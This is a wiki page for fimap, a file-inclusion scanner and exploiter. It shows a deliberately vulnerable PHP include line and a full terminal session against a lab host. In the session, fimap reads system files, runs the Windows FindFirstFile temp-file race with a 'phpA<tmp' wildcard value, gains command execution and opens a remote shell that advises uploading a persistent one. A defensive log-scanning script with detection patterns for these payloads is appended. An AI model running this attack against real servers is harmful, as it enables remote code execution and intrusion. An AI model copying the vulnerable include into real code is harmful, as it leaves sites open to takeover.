FimapFindFirstFileExploit
Oweoqi edited this page Mar 27, 2015 · 1 revision
It only works on Windows servers :)
<?php include($_GET["tmp"]); ?>
imax /st0rage/dev/fimap/src $ ./fimap.py -u "http://192.168.178.105/ex.php?tmp=a"
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
SingleScan is testing URL: 'http://192.168.178.105/ex.php?tmp=a'
[12:08:27] [OUT] Inspecting URL 'http://192.168.178.105/ex.php?tmp=a'...
[12:08:27] [INFO] Fiddling around with URL...
[12:08:27] [OUT] [PHP] Possible file inclusion found! -> 'http://192.168.178.105/ex.php?tmp=V3ELOQJ0' with Parameter 'tmp'.
[12:08:27] [OUT] [PHP] Identifying Vulnerability 'http://192.168.178.105/ex.php?tmp=a' with Parameter 'tmp'...
[12:08:27] [INFO] Scriptpath received: 'C:\xampp\htdocs'
[12:08:27] [INFO] Operating System is 'Windows'.
[12:08:27] [INFO] Testing file 'c:\boot.ini'...
[12:08:27] [INFO] Testing file 'c:\windows\win.ini'...
[12:08:27] [INFO] Testing file 'php://input'...
[12:08:27] [INFO] Testing file 'C:\Program Files\Apache Group\Apache\logs\access.log'...
[12:08:27] [INFO] Testing file 'C:\Program Files\Apache Group\Apache\logs\access_log'...
[12:08:27] [INFO] Testing file 'http://www.phpbb.de/index.php'...
########################################################
#[1] Possible PHP-File Inclusion #
########################################################
#::REQUEST #
# [URL] http://192.168.178.105/ex.php?tmp=a #
# [HEAD SENT] #
#::VULN INFO #
# [GET PARAM] tmp #
# [PATH] C:\xampp\htdocs #
# [OS] Windows #
# [TYPE] Absolute Clean #
# [TRUNCATION] No Need. It's clean. #
# [READABLE FILES] #
# [0] c:\windows\win.ini #
########################################################
imax /st0rage/dev/fimap/src $
imax /st0rage/dev/fimap/src $ ./fimap.py -X
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
#########################################################################
#:: List of Domains :: #
#########################################################################
#[1] 192.168.178.105 #
#[q] Quit #
#########################################################################
WARNING: Some domains may be not listed here because dynamic_rfi is not configured!
Choose Domain: 1
[11:34:31] [OUT] You have selected a file which is only readable.
[11:34:31] [OUT] Lets see if one of our plugins is interested in it...
#######################################################################
#Fallback Plugin Selection #
#######################################################################
#[1] [FindFirstFile] Launch FindFirstFile Glitch (Windows only)... #
#[2] [PHPInfo] Launch Coldwind/Insomnia Glitch... #
#[q] Quit #
#######################################################################
Your Selection: 1
###############################################################
#FindFirstFile Glitch #
###############################################################
#1. Enter Path of TempDir #
#2. AutoProbe for TempDir #
# Current TempDir: c:\xampp\tmp #
#3. Change number of attempts (Current: 5000) #
#4. Change number of threads (Current: 50) #
#5. Change eggdrop location (Current: c:\\xampp\\tmp\\egg) #
#6. Change your lottery ticket (Current: phpA<tmp) #
#7. Launch attack #
#0. WTF is this shit? #
#q. Back to fimap #
###############################################################
Choose action: 7
Launching attack...
Thread Attempt 1 started...
Thread Attempt 2 started...
Thread Attempt 3 started...
Thread Attempt 4 started...
Thread Attempt 5 started...
Thread Attempt 6 started...
Thread Attempt 7 started...
Thread Attempt 8 started...
Thread Attempt 9 started...
Thread Attempt 10 started...
Thread Attempt 11 started...
Thread Attempt 12 started...
Thread Attempt 13 started...
Thread Attempt 14 started...
Thread Attempt 15 started...
Thread Attempt 16 started...
Thread Attempt 17 started...
Thread Attempt 18 started...
Thread Attempt 19 started...
Thread Attempt 20 started...
Thread Attempt 21 started...
Thread Attempt 22 started...
Thread Attempt 23 started...
Thread Attempt 24 started...
Thread Attempt 25 started...
Thread Attempt 26 started...
Thread Attempt 27 started...
Thread Attempt 28 started...
Thread Attempt 29 started...
......................
......................
......................
Thread Attempt 304 started...
Thread Attempt 305 started...
Thread Attempt 306 started...
Thread Attempt 307 started...
Thread Attempt 308 started...
Egg dropped successfully!
Waiting for remaining threads to finish...
Hit CTRL+C to just kill the threads like an arse.
Finished.
PHP Code Injection thru EggDrop works!
[11:35:13] [INFO] Testing execution thru 'popen[b64][win]'...
[11:35:13] [OUT] Execution thru 'popen[b64][win]' works!
--------------------------------------------------------------------
Welcome to the fimap_eggshell!
This is a lite version of the fimap shell.
Consider this shell as a temporary shell you should get rid of asap.
Upload your own shell to be on the safe side.
--------------------------------------------------------------------
fimap_eggshell> dir
Volume in drive C has no label.
Volume Serial Number is 3CEF-FBFF
Directory of C:\xampp\htdocs
05.10.2012 13:22 <DIR> .
05.10.2012 13:22 <DIR> ..
16.04.2012 17:30 2.326 apache_pb.gif
16.04.2012 17:30 1.385 apache_pb.png
16.04.2012 17:30 2.414 apache_pb2.gif
16.04.2012 17:30 1.463 apache_pb2.png
16.04.2012 17:30 2.160 apache_pb2_ani.gif
05.10.2012 13:22 33 ex.php
16.04.2012 17:30 7.782 favicon.ico
05.10.2012 13:17 <DIR> forbidden
16.04.2012 17:30 202 index.html
16.04.2012 17:30 267 index.php
05.10.2012 13:17 <DIR> restricted
05.10.2012 13:21 <DIR> xampp
9 File(s) 18.032 bytes
5 Dir(s) 34.958.737.408 bytes free
fimap_eggshell> type ex.php
<?php
include($_GET["tmp"]);
?>
fimap_eggshell>
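
A defender's view of the session above, as an added example (not part of fimap or of the original wiki page): it scans web-server access-log lines for query parameters carrying the kinds of values the output shows reaching `include()`, namely absolute Windows paths, stream wrappers or remote URLs, and the `<` character seen in the "lottery ticket" value. The log lines, rule names and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (common log format); not taken from the page.
SAMPLE_LOG = r'''
192.168.178.20 - - [05/Oct/2012:12:08:27 +0200] "GET /ex.php?tmp=c%3A%5Cwindows%5Cwin.ini HTTP/1.1" 200 512
192.168.178.20 - - [05/Oct/2012:12:08:27 +0200] "GET /ex.php?tmp=php%3A%2F%2Finput HTTP/1.1" 200 87
192.168.178.20 - - [05/Oct/2012:11:34:40 +0200] "GET /ex.php?tmp=phpA%3Ctmp HTTP/1.1" 200 90
192.168.178.21 - - [05/Oct/2012:11:40:02 +0200] "GET /index.php?page=about HTTP/1.1" 200 267
'''

# Pulls the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Hypothetical rule set: each rule names one class of suspicious parameter value.
RULES = [
    ("stream-wrapper", re.compile(r'^[a-z][a-z0-9+.\-]*://', re.I)),  # php://, http://
    ("absolute-windows-path", re.compile(r'^[a-z]:[\\/]', re.I)),     # c:\...
    ("win32-wildcard", re.compile(r'[<>]')),                          # '<' or '>' in a path
]

def classify(value):
    """Return the names of all rules that match a decoded parameter value."""
    return [name for name, rx in RULES if rx.search(value)]

def scan(log_text):
    """Return (client, path, param, decoded value, rule names) per suspicious parameter."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        # parse_qsl percent-decodes names and values, so %3C is matched as '<'.
        for param, value in parse_qsl(target.query, keep_blank_values=True):
            hits = classify(value)
            if hits:
                findings.append((line.split()[0], target.path, param, value, hits))
    return findings

if __name__ == "__main__":
    for client, path, param, value, hits in scan(SAMPLE_LOG):
        print(f"{client} {path} {param}={value!r} -> {', '.join(hits)}")
```

Matching on the decoded value matters here, since the same characters can arrive percent-encoded; the rules only cover query strings, so parameters sent in a request body need the same check applied at the application or WAF layer.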